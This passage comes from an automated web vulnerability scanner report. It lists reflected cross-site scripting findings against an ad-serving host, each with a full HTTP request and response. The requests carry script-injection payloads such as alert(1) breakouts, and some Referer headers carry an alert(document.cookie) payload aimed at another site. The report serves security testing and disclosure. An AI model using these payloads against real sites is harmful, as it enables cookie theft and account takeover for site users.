<html><head><title>FreePhone_TestEvergreen_160x600_011811</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCIN1295373277700();
var _CIN1295373277700_Instance =
{
click : "462ea</script><script>alert(1)</script>69e81c4a77c",
clickThruUrl: "http://clk.redcated/go/287065754/direct;pc.106032482;wi.160;hi.600;ai.199704563;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : func
...[SNIP]...

5.276. http://redcated/CNT/iview/287065754/direct [pc.106032482;wi.160;hi.600/01?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/287065754/direct

Issue detail

The value of the pc.106032482;wi.160;hi.600/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d434b'-alert(1)-'d9aa05425d9 was submitted in the pc.106032482;wi.160;hi.600/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=d434b'-alert(1)-'d9aa05425d9 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6870
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:48 GMT

<html><head><title>FreePhone_TestEvergreen_160x600_011811</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
;
if ( "%OOB%" == "1" )
_strContentCIN1295373277700 = _strContentCIN1295373277700.replace(/!~!click!~!/g,'');
else
_strContentCIN1295373277700 = _strContentCIN1295373277700.replace(/!~!click!~!/g,'d434b'-alert(1)-'d9aa05425d9');
}
else
{
_strContentCIN1295373277700 = '<a target="_blank" href="http://clk.atdmt.com/go/287065754/direct;pc.106032482;wi.160;hi.600;ai.199723628;ct.1/01/" onclick="if(\'d434b'-alert(1)-'d9a
...[SNIP]...

5.277. http://redcated/CNT/iview/299297287/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/299297287/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e8ca"><script>alert(1)</script>65ba48f2cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/299297287/direct;pc.106028736;wi.300;hi.120/01?click=&3e8ca"><script>alert(1)</script>65ba48f2cfe=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: MUID=AD04D6F8B2FF44629973BD0674351135

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 307
Content-Type: text/html
Expires: 0
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296344800-3941560; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:46:39 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/199711109/299297287/direct;pc.106028736;wi.300;hi.120/01" onclick="(new Image).src='&3e8ca"><script>alert(1)</script>65ba48f2cfe=1http://t.redcated'">
...[SNIP]...

5.278. http://redcated/DEN/jview/286026710/direct [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /DEN/jview/286026710/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17047'%3bd5b850e643 was submitted in the REST URL parameter 4. This input was echoed as 17047';d5b850e643 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/jview/286026710/direct17047'%3bd5b850e643 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6620
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:22:35 GMT
Connection: close

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

   
var nRequiredVersion = 9;
var bIsRightVersion = fal
...[SNIP]...
<param name="FlashVars" value="ArmClickType='+ armapi_ArmClickType + '&unique_id=_ISA1292630112506&ArmApi=armapi_a1_a1&ArmClickUrl=http://clk.redcated/go/286026710/direct17047';d5b850e643;ai.195291342;ct.$num$/01/&ArmClickToken=$num$ver=1&clickTag1=!~!click!~!http://clk.redcated/go/286026710/direct17047';d5b850e643;ai.195291342;ct.1/01&clickTag2=!~!click!~!http://clk.atdmt.com/go/2860
...[SNIP]...

5.279. http://redcated/DEN/jview/286026710/direct [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /DEN/jview/286026710/direct

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70d95'-alert(1)-'4fb7f8f1dba was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/jview/286026710/direct;;vt.1/01?buster_url=&pub_view_url=&click=70d95'-alert(1)-'4fb7f8f1dba HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6546
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:51 GMT

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

   
var nRequiredVersion = 9;
var bIsRightVersion = fal
...[SNIP]...
f ( "%OOB%" == "1" )
_strContentISA1292630112506 = _strContentISA1292630112506.replace(/!~!click!~!/g,'');
else
_strContentISA1292630112506 = _strContentISA1292630112506.replace(/!~!click!~!/g,'70d95'-alert(1)-'4fb7f8f1dba');


}
else
{
_strContentISA1292630112506 = '<a target="_blank" href="http://clk.atdmt.com/go/286026710/direct;vt.1;ai.195291342;ct.1/01/" onclick="if(\'70d95'-alert(1)-'4fb7f8f1dba\')(new
...[SNIP]...

5.280. http://redcated/DEN/jview/286026710/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /DEN/jview/286026710/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7580e"-alert(1)-"89273f46f38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/jview/286026710/direct;;vt.1/01?buster_url=&pub_view_url=&click=&7580e"-alert(1)-"89273f46f38=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 5866
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:35:01 GMT


document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

   
var nRequiredVersion = 8;
var bIsRightVersion = f
...[SNIP]...
nt.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}


}
detectPluginISA1288888885066();

var _ISA1288888885066_Instance =
{
click : "&7580e"-alert(1)-"89273f46f38=1",
clickThruUrl: "http://clk.redcated/go/286026710/direct;vt.1;ai.189504609;ct.$num$/01/",
imgs : []
};

if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(u
...[SNIP]...

5.281. http://redcated/DEN/jview/286026710/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /DEN/jview/286026710/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6b28'-alert(1)-'25084a46f21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/jview/286026710/direct;;vt.1/01?buster_url=&pub_view_url=&click=&f6b28'-alert(1)-'25084a46f21=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6573
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:35:03 GMT

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

   
var nRequiredVersion = 8;
var bIsRightVersion = fal
...[SNIP]...
( "%OOB%" == "1" )
_strContentISA1292628901264 = _strContentISA1292628901264.replace(/!~!click!~!/g,'');
else
_strContentISA1292628901264 = _strContentISA1292628901264.replace(/!~!click!~!/g,'&f6b28'-alert(1)-'25084a46f21=1');


}
else
{
_strContentISA1292628901264 = '<a target="_blank" href="http://clk.atdmt.com/go/286026710/direct;vt.1;ai.195284525;ct.1/01/" onclick="if(\'&f6b28'-alert(1)-'25084a46f21=1\')
...[SNIP]...

5.282. http://redcated/NYC/iview/264935949/direct [;wi.300;hi.250/01?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/264935949/direct

Issue detail

The value of the ;wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1215c</script><script>alert(1)</script>cfe86179be9 was submitted in the ;wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=1215c</script><script>alert(1)</script>cfe86179be9 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6482
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 15:04:38 GMT

<html>
<head>
<title>BND_IstanbulHT_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border
...[SNIP]...
if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
   }
}
detectPluginCIT8217023605879();
var _CIT8217023605879_Instance =
{
click : "1215c</script><script>alert(1)</script>cfe86179be9",
clickThruUrl: "http://clk.redcated/go/264935949/direct;wi.300;hi.250;ai.199548164;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

5.283. http://redcated/NYC/iview/264935949/direct [;wi.300;hi.250/01?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/264935949/direct

Issue detail

The value of the ;wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cda0a'-alert(1)-'bb646d27c0c was submitted in the ;wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=cda0a'-alert(1)-'bb646d27c0c HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6706
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 15:04:40 GMT

<html>
<head>
<title>BND_Goodson2_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...
;
if ( "%OOB%" == "1" )
_strContentCIT8003109364835 = _strContentCIT8003109364835.replace(/!~!click!~!/g,'');
else
_strContentCIT8003109364835 = _strContentCIT8003109364835.replace(/!~!click!~!/g,'cda0a'-alert(1)-'bb646d27c0c');
}
else
{
_strContentCIT8003109364835 = '<a target="_blank" href="http://clk.atdmt.com/go/264935949/direct;wi.300;hi.250;ai.197994903;ct.1/01/" onclick="if(\'cda0a'-alert(1)-'bb646d27c0c\')(n
...[SNIP]...

5.284. http://redcated/NYC/iview/264935949/direct [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /NYC/iview/264935949/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d623e'%3b444294c40e was submitted in the REST URL parameter 4. This input was echoed as d623e';444294c40e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYC/iview/264935949/directd623e'%3b444294c40e;;wi.300;hi.250/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6382
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 15:05:06 GMT

<html>
<head>
<title>BND_IstSpice_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/AANYCCITICIT/CitiBrand2H/BND_IstSpice_FL_300x250_MSN.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/264935949/directd623e';444294c40e;wi.300;hi.250;ai.199548196;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/264935949/directd623e';444294c40e;wi.300;hi.250;ai.199548196;ct.1/01" />
...[SNIP]...

5.285. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/264935949/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54cc3"-alert(1)-"5d7a2901fc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=&54cc3"-alert(1)-"5d7a2901fc7=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6394
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 15:04:49 GMT

<html>
<head>
<title>BND_IstanbulHT_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border
...[SNIP]...
if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
   }
}
detectPluginCIT8217023605879();
var _CIT8217023605879_Instance =
{
click : "&54cc3"-alert(1)-"5d7a2901fc7=1",
clickThruUrl: "http://clk.redcated/go/264935949/direct;wi.300;hi.250;ai.199548164;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

5.286. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/264935949/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97af1"><script>alert(1)</script>8e072145e04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=&97af1"><script>alert(1)</script>8e072145e04=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6459
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 15:04:47 GMT

<html>
<head>
<title>BND_IstSpice_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/264935949/direct;wi.300;hi.250;ai.199548196;ct.1/01/" onclick="if(\'&97af1"><script>alert(1)</script>8e072145e04=1\')(new Image).src=\'&97af1">
...[SNIP]...

5.287. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/264935949/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d20a'-alert(1)-'4fe7bcd4f48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=&5d20a'-alert(1)-'4fe7bcd4f48=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6721
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 15:04:51 GMT

<html>
<head>
<title>BND_Goodson2_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...

if ( "%OOB%" == "1" )
_strContentCIT8003109364835 = _strContentCIT8003109364835.replace(/!~!click!~!/g,'');
else
_strContentCIT8003109364835 = _strContentCIT8003109364835.replace(/!~!click!~!/g,'&5d20a'-alert(1)-'4fe7bcd4f48=1');
}
else
{
_strContentCIT8003109364835 = '<a target="_blank" href="http://clk.atdmt.com/go/264935949/direct;wi.300;hi.250;ai.197994903;ct.1/01/" onclick="if(\'&5d20a'-alert(1)-'4fe7bcd4f48=1
...[SNIP]...

5.288. http://redcated/PTR/jview/240321567/direct [wi.1;hi.1/01?relocate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /PTR/jview/240321567/direct

Issue detail

The value of the wi.1;hi.1/01?relocate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11f28'-alert(1)-'ecdf65e1367 was submitted in the wi.1;hi.1/01?relocate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PTR/jview/240321567/direct;wi.1;hi.1/01?relocate=http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link11f28'-alert(1)-'ecdf65e1367 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 420
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:39 GMT

document.writeln('<scr' + 'ipt src="' + 'http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link11f28'-alert(1)-'ecdf65e1367' + '/ATCI=' + '1294100002-3786607' + '">
...[SNIP]...

5.289. http://redcated/ULA/iview/296652509/direct [/01?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /ULA/iview/296652509/direct

Issue detail

The value of the /01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dec58</script><script>alert(1)</script>71466742f94 was submitted in the /01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ULA/iview/296652509/direct;/01?click=dec58</script><script>alert(1)</script>71466742f94 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
